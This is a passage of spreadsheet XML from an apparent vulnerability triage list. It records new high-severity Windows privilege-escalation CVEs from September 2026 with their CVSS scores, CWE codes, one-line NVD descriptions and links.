/><c r="H508" s="5" t="n"><v>0.003</v></c><c r="I508" s="5" t="inlineStr" /><c r="J508" s="5" t="inlineStr" /><c r="K508" s="5" t="inlineStr" /><c r="L508" s="5" t="inlineStr" /><c r="M508" s="5" t="inlineStr" /><c r="N508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q508" s="5" t="inlineStr" /><c r="R508" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S508" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t></is></c></row><row r="509"><c r="A509" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C509" s="5" t="inlineStr"><is><t>CVE-2026-69421</t></is></c><c r="D509" s="5" t="n"><v>7.8</v></c><c r="E509" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F509" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G509" s="5" t="inlineStr" /><c r="H509" s="5" t="n"><v>0.003</v></c><c r="I509" s="5" t="inlineStr" /><c r="J509" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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09" s="5" t="inlineStr" /><c r="M509" s="5" t="inlineStr" /><c r="N509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q509" s="5" t="inlineStr" /><c r="R509" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S509" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t></is></c></row><row r="510"><c r="A510" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C510" s="5" t="inlineStr"><is><t>CVE-2026-69424</t></is></c><c r="D510" s="5" t="n"><v>7.8</v></c><c r="E510" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G510" s="5" t="inlineStr" /><c r="H510" s="5" t="n"><v>0.003</v></c><c r="I510" s="5" t="inlineStr" /><c r="J510" s="5" t="inlineStr" /><c r="K510" s="5" t="inlineStr" /><c r="L510" s="5" t="inlineStr" /><c r="M510" s="5" t="inlineStr" /><c r="N510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P510" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q510" s="5" t="inlineStr" /><c r="R510" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S510" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t></is></c></row><row r="511"><c r="A511" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C511" s="5" t="inlineStr"><is><t>CVE-2026-69426</t></is></c><c r="D511" s="5" t="n"><v>7.8</v></c><c r="E511" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F511" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G511" s="5" t="inlineStr" /><c r="H511" s="5" t="n"><v>0.003</v></c><c r="I511" s="5" t="inlineStr" /><c r="J511" s="5" t="inlineStr" /><c r="K511" s="5" t="inlineStr" /><c r="L511" s="5" t="inlineStr" /><c r="M511" s="5" t="inlineStr" /><c r="N511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P511" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q511" s="5" t="inlineStr" /><c r="R511" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S511" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t></is></c><c r="T511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t></is></c></row><row r="512"><c r="A512" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C512" s="5" t="inlineStr"><is><t>CVE-2026-69432</t></is></c><c r="D512" s="5" t="n"><v>7.8</v></c><c r="E512" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F512" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G512" s="5" t="inlineStr" /><c r="H512" s="5" t="n"><v>0.003</v></c><c r="I512" s="5" t="inlineStr" /><c r="J512" s="5" t="inlineStr" /><c r="K512" s="5" t="inlineStr" /><c r="L512" s="5" t="inlineStr" /><c r="M512" s="5" t="inlineStr" /><c r="N512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q512" s="5" t="inlineStr" /><c r="R512" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S512" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t></is></c></row><row r="513"><c r="A513" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C513" s="5" t="inlineStr"><is><t>CVE-2026-69433</t></is></c><c r="D513" s="5" t="n"><v>7.8</v></c><c r="E513" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F513" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G513" s="5" t="inlineStr" /><c r="H513" s="5" t="n"><v>0.003</v></c><c r="I513" s="5" t="inlineStr" /><c r="J513" s="5" t="inlineStr" /><c r="K513" s="5" t="inlineStr" /><c r="L513" s="5" t="inlineStr" /><c r="M513" s="5" t="inlineStr" /><c r="N513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P513" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q513" s="5" t="inlineStr" /><c r="R513" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S513" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t></is></c></row><row r="514"><c r="A514" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C514" s="5" t="inlineStr"><is><t>CVE-2026-69436</t></is></c><c r="D514" s="5" t="n"><v>7.8</v></c><c r="E514" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G514" s="5" t="inlineStr" /><c r="H514" s="5" t="n"><v>0.003</v></c><c r="I514" s="5" t="inlineStr" /><c r="J514" s="5" t="inlineStr" /><c r="K514" s="5" t="inlineStr" /><c r="L514" s="5" t="inlineStr" /><c r="M514" s="5" t="inlineStr" /><c r="N514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P514" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q514" s="5" t="inlineStr" /><c r="R514" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S514" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t></is></c></row><row r="515"><c r="A515" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C515" s="5" t="inlineStr"><is><t>CVE-2026-69444</t></is></c><c r="D515" s="5" t="n"><v>7.8</v></c><c r="E515" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G515" s="5" t="inlineStr" /><c r="H515" s="5" t="n"><v>0.003</v></c><c r="I515" s="5" t="inlineStr" /><c r="J515" s="5" t="inlineStr" /><c r="K515" s="5" t="inlineStr" /><c r="L515" s="5" t="inlineStr" /><c r="M515" s="5" t="inlineStr" /><c r="N515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P515" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q515" s="5" t="inlineStr" /><c r="R515" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S515" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t></is></c></row><row r="516"><c r="A516" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C516" s="5" t="inlineStr"><is><t>CVE-2026-69445</t></is></c><c r="D516" s="5" t="n"><v>7.8</v></c><c r="E516" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F516" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G516" s="5" t="inlineStr" /><c r="H516" s="5" t="n"><v>0.004</v></c><c r="I516" s="5" t="inlineStr" /><c r="J516" s="5" t="inlineStr" /><c r="K516" s="5" t="inlineStr" /><c r="L516" s="5" t="inlineStr" /><c r="M516" s="5" t="inlineStr" /><c r="N516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q516" s="5" t="inlineStr" /><c r="R516" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S516" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t></is></c></row><row r="517"><c r="A517" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C517" s="5" t="inlineStr"><is><t>CVE-2026-69447</t></is></c><c r="D517" s="5" t="n"><v>7.8</v></c><c r="E517" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F517" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G517" s="5" t="inlineStr" /><c r="H517" s="5" t="n"><v>0.003</v></c><c r="I517" s="5" t="inlineStr" /><c r="J517" s="5" t="inlineStr" /><c r="K517" s="5" t="inlineStr" /><c r="L517" s="5" t="inlineStr" /><c r="M517" s="5" t="inlineStr" /><c r="N517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P517" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q517" s="5" t="inlineStr" /><c r="R517" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S517" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t></is></c></row><row r="518"><c r="A518" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C518" s="5" t="inlineStr"><is><t>CVE-2026-69450</t></is></c><c r="D518" s="5" t="n"><v>7.8</v></c><c r="E518" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F518" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G518" s="5" t="inlineStr" /><c r="H518" s="5" t="n"><v>0.003</v></c><c r="I518" s="5" t="inlineStr" /><c r="J518" s="5" t="inlineStr" /><c r="K518" s="5" t="inlineStr" /><c r="L518" s="5" t="inlineStr" /><c r="M518" s="5" t="inlineStr" /><c r="N518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q518" s="5" t="inlineStr" /><c r="R518" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S518" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t></is></c></row><row r="519"><c r="A519" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C519" s="5" t="inlineStr"><is><t>CVE-2026-69455</t></is></c><c r="D519" s="5" t="n"><v>7.8</v></c><c r="E519" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F519" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G519" s="5" t="inlineStr" /><c r="H519" s="5" t="n"><v>0.003</v></c><c r="I519" s="5" t="inlineStr" /><c r="J519" s="5" t="inlineStr" /><c r="K519" s="5" t="inlineStr" /><c r="L519" s="5" t="inlineStr" /><c r="M519" s="5" t="inlineStr" /><c r="N519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P519" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q519" s="5" t="inlineStr" /><c r="R519" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S519" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t></is></c></row><row r="520"><c r="A520" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C520" s="5" t="inlineStr"><is><t>CVE-2026-69456</t></is></c><c r="D520" s="5" t="n"><v>7.8</v></c><c r="E520" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F520" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G520" s="5" t="inlineStr" /><c r="H520" s="5" t="n"><v>0.003</v></c><c r="I520" s="5" t="inlineStr" /><c r="J520" s="5" t="inlineStr" /><c r="K520" s="5" t="inlineStr" /><c r="L520" s="5" t="inlineStr" /><c r="M520" s="5" t="inlineStr" /><c r="N520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P520" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q520" s="5" t="inlineStr" /><c r="R520" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S520" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t></is></c></row><row r="521"><c r="A521" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C521" s="5" t="inlineStr"><is><t>CVE-2026-69459</t></is></c><c r="D521" s="5" t="n"><v>7.8</v></c><c r="E521" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F521" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G521" s="5" t="inlineStr" /><c r="H521" s="5" t="n"><v>0.003</v></c><c r="I521" s="5" t="inlineStr" /><c r="J521" s="5" t="inlineStr" /><c r="K521" s="5" t="inlineStr" /><c r="L521" s="5" t="inlineStr" /><c r="M521" s="5" t="inlineStr" /><c r="N521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P521" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q521" s="5" t="inlineStr" /><c r="R521" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S521" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t></is></c></row><row r="522"><c r="A522" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C522" s="5" t="inlineStr"><is><t>CVE-2026-69467</t></is></c><c r="D522" s="5" t="n"><v>7.8</v></c><c r="E522" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F522" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G522" s="5" t="inlineStr" /><c r="H522" s="5" t="n"><v>0.003</v></c><c r="I522" s="5" t="inlineStr" /><c r="J522" s="5" t="inlineStr" /><c r="K522" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L522" s="5" t="inlineStr" /><c r="M522" s="5" t="inlineStr" /><c r="N522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q522" s="5" t="inlineStr" /><c r="R522" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S522" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t></is></c></row><row r="523"><c r="A523" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C523" s="5" t="inlineStr"><is><t>CVE-2026-69475</t></is></c><c r="D523" s="5" t="n"><v>7.8</v></c><c r="E523" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F523" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G523" s="5" t="inlineStr" /><c r="H523" s="5" t="n"><v>0.003</v></c><c r="I523" s="5" t="inlineStr" /><c r="J523" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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23" s="5" t="inlineStr" /><c r="M523" s="5" t="inlineStr" /><c r="N523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P523" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q523" s="5" t="inlineStr" /><c r="R523" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S523" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t></is></c></row><row r="524"><c r="A524" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C524" s="5" t="inlineStr"><is><t>CVE-2026-69476</t></is></c><c r="D524" s="5" t="n"><v>7.8</v></c><c r="E524" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F524" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G524" s="5" t="inlineStr" /><c r="H524" s="5" t="n"><v>0.003</v></c><c r="I524" s="5" t="inlineStr" /><c r="J524" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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24" s="5" t="inlineStr" /><c r="M524" s="5" t="inlineStr" /><c r="N524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P524" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q524" s="5" t="inlineStr" /><c r="R524" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S524" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t></is></c></row><row r="525"><c r="A525" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C525" s="5" t="inlineStr"><is><t>CVE-2026-69478</t></is></c><c r="D525" s="5" t="n"><v>7.8</v></c><c r="E525" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G525" s="5" t="inlineStr" /><c r="H525" s="5" t="n"><v>0.003</v></c><c r="I525" s="5" t="inlineStr" /><c r="J525" s="5" t="inlineStr" /><c r="K525" s="5" t="inlineStr" /><c r="L525" s="5" t="inlineStr" /><c r="M525" s="5" t="inlineStr" /><c r="N525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q525" s="5" t="inlineStr" /><c r="R525" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S525" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t></is></c></row><row r="526"><c r="A526" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C526" s="5" t="inlineStr"><is><t>CVE-2026-69480</t></is></c><c r="D526" s="5" t="n"><v>7.8</v></c><c r="E526" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F526" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G526" s="5" t="inlineStr" /><c r="H526" s="5" t="n"><v>0.003</v></c><c r="I526" s="5" t="inlineStr" /><c r="J526" s="5" t="inlineStr" /><c r="K526" s="5" t="inlineStr" /><c r="L526" s="5" t="inlineStr" /><c r="M526" s="5" t="inlineStr" /><c r="N526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P526" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q526" s="5" t="inlineStr" /><c r="R526" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S526" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t></is></c></row><row r="527"><c r="A527" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C527" s="5" t="inlineStr"><is><t>CVE-2026-69489</t></is></c><c r="D527" s="5" t="n"><v>7.8</v></c><c r="E527" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F527" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G527" s="5" t="inlineStr" /><c r="H527" s="5" t="n"><v>0.003</v></c><c r="I527" s="5" t="inlineStr" /><c r="J527" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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27" s="5" t="inlineStr" /><c r="M527" s="5" t="inlineStr" /><c r="N527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P527" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q527" s="5" t="inlineStr" /><c r="R527" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S527" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t></is></c></row><row r="528"><c r="A528" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C528" s="5" t="inlineStr"><is><t>CVE-2026-69508</t></is></c><c r="D528" s="5" t="n"><v>7.8</v></c><c r="E528" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F528" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G528" s="5" t="inlineStr" /><c r="H528" s="5" t="n"><v>0.003</v></c><c r="I528" s="5" t="inlineStr" /><c r="J528" s="5" t="inlineStr" /><c r="K528" s="5" t="inlineStr" /><c r="L528" s="5" t="inlineStr" /><c r="M528" s="5" t="inlineStr" /><c r="N528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q528" s="5" t="inlineStr" /><c r="R528" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S528" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t></is></c></row><row r="529"><c r="A529" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C529" s="5" t="inlineStr"><is><t>CVE-2026-69509</t></is></c><c r="D529" s="5" t="n"><v>7.8</v></c><c r="E529" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F529" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G529" s="5" t="inlineStr" /><c r="H529" s="5" t="n"><v>0.003</v></c><c r="I529" s="5" t="inlineStr" /><c r="J529" s="5" t="inlineStr" /><c r="K529" s="5" t="inlineStr" /><c r="L529" s="5" t="inlineStr" /><c r="M529" s="5" t="inlineStr" /><c r="N529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P529" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q529" s="5" t="inlineStr" /><c r="R529" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S529" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t></is></c></row><row r="530"><c r="A530" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C530" s="5" t="inlineStr"><is><t>CVE-2026-69513</t></is></c><c r="D530" s="5" t="n"><v>7.8</v></c><c r="E530" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F530" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G530" s="5" t="inlineStr" /><c r="H530" s="5" t="n"><v>0.003</v></c><c r="I530" s="5" t="inlineStr" /><c r="J530" s="5" t="inlineStr" /><c r="K530" s="5" t="inlineStr" /><c r="L530" s="5" t="inlineStr" /><c r="M530" s="5" t="inlineStr" /><c r="N530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P530" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q530" s="5" t="inlineStr" /><c r="R530" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S530" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t></is></c></row><row r="531"><c r="A531" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C531" s="5" t="inlineStr"><is><t>CVE-2026-69528</t></is></c><c r="D531" s="5" t="n"><v>7.8</v></c><c r="E531" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F531" s="5" 